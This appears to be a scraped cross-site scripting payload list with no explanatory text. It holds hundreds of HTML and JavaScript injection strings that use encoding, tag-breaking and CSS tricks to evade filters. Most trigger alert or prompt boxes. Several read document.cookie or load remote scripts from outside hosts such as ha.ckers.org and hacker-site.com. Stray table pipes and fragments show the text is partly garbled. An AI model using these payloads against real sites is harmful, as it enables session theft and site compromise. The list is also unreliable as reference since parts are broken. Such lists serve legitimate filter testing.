"><h1/onmouseover='\u0061lert(1)'> | |||
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |||
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |||
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |||
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |||
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |||
<iframe src=javascript:alert(document.location)> | |||
<form><a href="javascript:\u0061lert(1)">X | |||
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> | |||
<img/	  src=`~` onerror=prompt(1)> | |||
<form><iframe 	  src="javascript:alert(1)" 	;> | |||
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |||
http://www.google<script .com>alert(document.location)</script | |||
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |||
<img/src=@  onerror = prompt('1') | |||
<style/onload=prompt('XSS') | |||
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |||
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |||
�</form><input type="date" onfocus="alert(1)"> | |||
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |||
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |||
<iframe srcdoc='<body onload=prompt(1)>'> | |||
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |||
<script ~~~>alert(0%0)</script ~~~> | |||
<style/onload=<!--	> alert (1)> | |||
<///style///><span %2F onmousemove='alert(1)'>SPAN | |||
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |||
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |||
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |||
<marquee onstart='javascript:alert(1)'>^__^ | |||
<div/style="width:expression(confirm(1))">X</div> {IE7} | |||
<iframe// src=javaSCRIPT:alert(1) | |||
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |||
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |||
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |||
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |||
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |||
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |||
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |||
<a href="javascript:\u0061le%72t(1)"><button> | |||
<div onmouseover='alert(1)'>DIV</div> | |||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |||
<a href="jAvAsCrIpT:alert(1)">X</a> | |||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |||
<var onmouseover="prompt(1)">On Mouse Over</var> | |||
<a href=javascript:alert(document.cookie)>Click Here</a> | |||
<img src="/" =_=" title="onerror='prompt(1)'"> | |||
<%<!--'%><script>alert(1);</script --> | |||
<script src="data:text/javascript,alert(1)"></script> | |||
<iframe/src \/\/onload = prompt(1) | |||
<iframe/onreadystatechange=alert(1) | |||
<svg/onload=alert(1) | |||
<input value=<><iframe/src=javascript:confirm(1) | |||
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |||
<img src=`xx:xx`onerror=alert(1)> | |||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |||
<math><a xlink:href="//jsfiddle.net/t846h/">click | |||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |||
<svg contentScriptType=text/vbs><script>MsgBox+1 | |||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |||
<object data=javascript:\u0061le%72t(1)> | |||
<script>+-+-1-+-+alert(1)</script> | |||
<body/onload=<!-->
alert(1)> | |||
<script itworksinallbrowsers>/*<script* */alert(1)</script | |||
<img src ?itworksonchrome?\/onerror = alert(1) | |||
<svg><script>//
confirm(1);</script </svg> | |||
<svg><script onlypossibleinopera:-)> alert(1) | |||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |||
<script x> alert(1) </script 1=2 | |||
<div/onmouseover='alert(1)'> style="x:"> | |||
<--`<img/src=` onerror=alert(1)> --!> | |||
<script/src=data:text/javascript,alert(1)></script> | |||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |||
"><img src=x onerror=window.open('https://www.google.com/');> | |||
<form><button formaction=javascript:alert(1)>CLICKME | |||
<math><a xlink:href="//jsfiddle.net/t846h/">click | |||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |||
'';!--"<XSS>=&{()} | |||
'>//\\,<'>">">"*" | |||
'); alert('XSS | |||
< | <script>alert(1);</script> | ||
<script>alert('XSS');</script> | |||
< | <IMG SRC="javascript:alert('XSS');"> | ||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=javascript:alert("XSS")> | |||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |||
< | <scr<script>ipt>alert('XSS');</scr</script>ipt> | ||
<script>alert(String.fromCharCode(88,83,83))</script> | |||
< | <img src=foo.png onerror=alert(/xssed/) /> | ||
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> | |||
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> | |||
<marquee><script>alert('XSS')</script></marquee> | |||
<IMG SRC=\"jav	ascript:alert('XSS');\"> | |||
<IMG SRC=\"jav
ascript:alert('XSS');\"> | |||
< | <IMG SRC=\"jav
ascript:alert('XSS');\"> | ||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |||
"><script>alert(0)</script> | |||
< | <script src=http://yoursite.com/your_files.js></script> | ||
</title><script>alert(/xss/)</script> | |||
< | </textarea><script>alert(/xss/)</script> | ||
<IMG LOWSRC=\"javascript:alert('XSS')\"> | |||
< | <IMG DYNSRC=\"javascript:alert('XSS')\"> | ||
<font style='color:expression(alert(document.cookie))'> | |||
<img src="javascript:alert('XSS')"> | |||
<script language="JavaScript">alert('XSS')</script> | |||
<body onunload="javascript:alert('XSS');"> | |||
<body onLoad="alert('XSS');" | |||
[color=red' onmouseover="alert('xss')"]mouse over[/color] | |||
"/></a></><img src=1.gif onerror=alert(1)> | |||
window.alert("Bonjour !"); | |||
<div style="x:expression((window.r==1)?'':eval('r=1; | |||
< | alert(String.fromCharCode(88,83,83));'))"> | ||
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> | |||
< | "><script alert(String.fromCharCode(88,83,83))</script> | ||
'>><marquee><h1>XSS</h1></marquee> | |||
< | '">><script>alert('XSS')</script> | ||
'">><marquee><h1>XSS</h1></marquee> | |||
</ | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> | ||
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> | |||
<script>var var = 1; alert(var)</script> | |||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |||
<?='<SCRIPT>alert("XSS")</SCRIPT>'?> | |||
<IMG SRC='vbscript:msgbox(\"XSS\")'> | |||
" onfocus=alert(document.domain) "> <" | |||
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> | |||
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS | |||
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out | |||
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out | |||
<br size=\"&{alert('XSS')}\"> | |||
<scrscriptipt>alert(1)</scrscriptipt> | |||
</br style=a:expression(alert())> | |||
</script><script>alert(1)</script> | |||
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |||
[color=red width=expression(alert(123))][color] | |||
<BASE HREF="javascript:alert('XSS');//"> | |||
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< | |||
"></iframe><script>alert(123)</script> | |||
<body onLoad="while(true) alert('XSS');"> | |||
'"></title><script>alert(1111)</script> | |||
</textarea>'"><script>alert(document.cookie)</script> | |||
'""><script language="JavaScript"> alert('X \nS \nS');</script> | |||
</script></script><<<<script><>>>><<<script>alert(123)</script> | |||
<html><noalert><noscript>(123)</noscript><script>(123)</script> | |||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |||
'></select><script>alert(123)</script> | |||
'>"><script src = 'http://www.site.com/XSS.js'></script> | |||
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> | |||
<SCRIPT>document.write("XSS");</SCRIPT> | |||
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); | |||
='><script>alert("xss")</script> | |||
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> | |||
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> | |||
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> | |||
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> | |||
src="http://www.site.com/XSS.js"></script> | |||
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= | |||
!--" /><script>alert('xss');</script> | |||
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> | |||
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> | |||
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> | |||
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> | |||
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> | |||
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> | |||
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> | |||
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> | |||
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' | |||
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" | |||
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' | |||
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? | |||
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? | |||
'); alert('xss'); var x=' | |||
\\'); alert(\'xss\');var x=\' | |||
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); | |||
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> | |||
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> | |||
</body> | |||
</html> | |||
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> | |||
<SCRIPT> alert(“XSS”); </SCRIPT> | |||
<BODY ONLOAD=alert("XSS")> | |||
<BODY BACKGROUND="javascript:alert('XSS')"> | |||
<IMG SRC="javascript:alert('XSS');"> | |||
<IMG DYNSRC="javascript:alert('XSS')"> | |||
<IMG LOWSRC="javascript:alert('XSS')"> | |||
<IFRAME SRC=”http://hacker-site.com/xss.html”> | |||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |||
<TABLE BACKGROUND="javascript:alert('XSS')"> | |||
<TD BACKGROUND="javascript:alert('XSS')"> | |||
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |||
<DIV STYLE="width: expression(alert('XSS'));"> | |||
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> | |||
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> | |||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |||
'';!--"<XSS>=&{()} | |||
<SCRIPT>alert('XSS')</SCRIPT> | |||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |||
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |||
<BASE HREF="javascript:alert('XSS');//"> | |||
<BGSOUND SRC="javascript:alert('XSS');"> | |||
<BODY BACKGROUND="javascript:alert('XSS');"> | |||
<BODY ONLOAD=alert('XSS')> | |||
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |||
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> | |||
<DIV STYLE="width: expression(alert('XSS'));"> | |||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |||
<IMG SRC="javascript:alert('XSS');"> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG DYNSRC="javascript:alert('XSS');"> | |||
<IMG LOWSRC="javascript:alert('XSS');"> | |||
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |||
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |||
exp/*<XSS STYLE='no\xss:noxss("*//*"); | |||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |||
<IMG SRC='vbscript:msgbox("XSS")'> | |||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> | |||
<IMG SRC="livescript:[code]"> | |||
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE | |||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |||
<IMG SRC="mocha:[code]"> | |||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |||
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> | |||
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); | |||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |||
<XSS STYLE="xss:expression(alert('XSS'))"> | |||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |||
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> | |||
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> | |||
<HTML xmlns:xss> | |||
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> | |||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> | |||
<HTML><BODY> | |||
<!--[if gte IE 4]> | |||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |||
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> | |||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |||
<? echo('<SCR)'; | |||
<BR SIZE="&{alert('XSS')}"> | |||
<IMG SRC=JaVaScRiPt:alert('XSS')> | |||
<IMG SRC=javascript:alert(&quot;XSS&quot;)> | |||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |||
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> | |||
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> | |||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |||
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> | |||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |||
\";alert('XSS');// | |||
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |||
<IMG SRC="jav	ascript:alert('XSS');"> | |||
<IMG SRC="jav&#x09;ascript:alert('XSS');"> | |||
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> | |||
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> | |||
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 | |||
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out | |||
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out | |||
<IMG SRC=" &#14; javascript:alert('XSS');"> | |||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |||
<SCRIPT SRC=http://ha.ckers.org/xss.js | |||
<SCRIPT SRC=//ha.ckers.org/.j> | |||
<IMG SRC="javascript:alert('XSS')" | |||
<IFRAME SRC=http://ha.ckers.org/scriptlet.html < | |||
<<SCRIPT>alert("XSS");//<</SCRIPT> | |||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |||
<SCRIPT>a=/XSS/ | |||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<A HREF="http://66.102.7.147/">XSS</A> | |||
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |||
<A HREF="http://1113982867/">XSS</A> | |||
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |||
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |||
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A> | |||
<A HREF="//www.google.com/">XSS</A> | |||
<A HREF="//google">XSS</A> | |||
<A HREF="http://ha.ckers.org@google">XSS</A> | |||
<A HREF="http://google:ha.ckers.org">XSS</A> | |||
<A HREF="http://google.com/">XSS</A> | |||
<A HREF="http://www.google.com./">XSS</A> | |||
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> | |||
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> | |||
<script>document.vulnerable=true;</script> | |||
<img SRC="jav ascript:document.vulnerable=true;"> | |||
<img SRC="javascript:document.vulnerable=true;"> | |||
<img SRC="  javascript:document.vulnerable=true;"> | |||
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> | |||
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> | |||
<script <B>document.vulnerable=true;</script> | |||
<img SRC="javascript:document.vulnerable=true;" | |||
<iframe src="javascript:document.vulnerable=true; < | |||
<script>a=/XSS/\ndocument.vulnerable=true;</script> | |||
\";document.vulnerable=true;;// | |||
</title><SCRIPT>document.vulnerable=true;</script> | |||
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> | |||
<body BACKGROUND="javascript:document.vulnerable=true;"> | |||
<body ONLOAD=document.vulnerable=true;> | |||
<img DYNSRC="javascript:document.vulnerable=true;"> | |||
<img LOWSRC="javascript:document.vulnerable=true;"> | |||
<bgsound SRC="javascript:document.vulnerable=true;"> | |||
<br SIZE="&{document.vulnerable=true}"> | |||
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> | |||
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> | |||
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS | |||
<img SRC='vbscript:document.vulnerable=true;'> | |||
1script3document.vulnerable=true;1/script3 | |||
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> | |||
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> | |||
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> | |||
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> | |||
<table BACKGROUND="javascript:document.vulnerable=true;"> | |||
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> | |||
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |||
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |||
<div STYLE="width: expression(document.vulnerable=true);"> | |||
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> | |||
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> | |||
<XSS STYLE="xss:expression(document.vulnerable=true)"> | |||
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> | |||
<style TYPE="text/javascript">document.vulnerable=true;</style> | |||
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> | |||
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> | |||
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> | |||
<base HREF="javascript:document.vulnerable=true;//"> | |||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> | |||
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> | |||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> | |||
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> | |||
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> | |||
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> | |||
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- | |||
<a href="javascript#document.vulnerable=true;"> | |||
